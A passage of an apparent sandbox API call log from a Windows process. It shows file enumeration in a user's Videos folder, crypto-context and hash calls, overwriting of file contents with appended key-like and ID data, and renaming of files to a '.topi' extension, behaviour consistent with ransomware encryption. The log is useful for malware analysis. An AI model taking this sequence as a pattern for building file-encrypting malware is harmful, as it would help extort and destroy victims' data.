[0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5048 [0097.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5060 [0097.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5030 [0097.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.911] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\rK5h.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\rk5h.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\rK5h.flv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\rk5h.flv.topi")) returned 1 [0097.912] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.912] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.912] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.913] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.913] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c0deff0, ftCreationTime.dwHighDateTime=0x1d5c451, ftLastAccessTime.dwLowDateTime=0x5d218700, ftLastAccessTime.dwHighDateTime=0x1d5b5a4, ftLastWriteTime.dwLowDateTime=0x5d218700, ftLastWriteTime.dwHighDateTime=0x1d5b5a4, nFileSizeHigh=0x0, nFileSizeLow=0x891e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tyepReLf6GWyO0HkO.avi", cAlternateFileName="TYEPRE~1.AVI")) returned 1 [0097.913] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\tyepReLf6GWyO0HkO.avi") returned=".avi" [0097.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\tyepReLf6GWyO0HkO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\tyeprelf6gwyo0hko.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.914] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=35102) returned 1 [0097.914] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.917] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x88f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.917] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.918] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.918] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.918] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.919] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.919] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.919] GetLastError () returned 0x0 [0097.919] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.919] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.919] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.919] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.919] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8920) returned 0x9a06a00 [0097.919] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbb60 [0097.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5018 [0097.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbba8 [0097.919] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5030 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5060 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5078 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.920] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5060 | out: hHeap=0x680000) returned 1 [0097.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5078 | out: hHeap=0x680000) returned 1 [0097.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5078 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5060 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5078 | out: hHeap=0x680000) returned 1 [0097.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5060 | out: hHeap=0x680000) returned 1 [0097.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.922] GetCurrentThreadId () returned 0x8c4 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa6a0 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.922] GetCurrentThreadId () returned 0x8c4 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5060 [0097.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5078 [0097.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5048 [0097.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.924] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5090 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5060 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5060 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5060 | out: hHeap=0x680000) returned 1 [0097.925] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.926] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5090 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5078 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5048 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5030 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbba8 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.926] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.927] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x8919, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x8919, lpOverlapped=0x0) returned 1 [0097.927] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.927] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x891e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.927] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.927] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.927] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.927] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.927] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.927] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.927] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.927] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 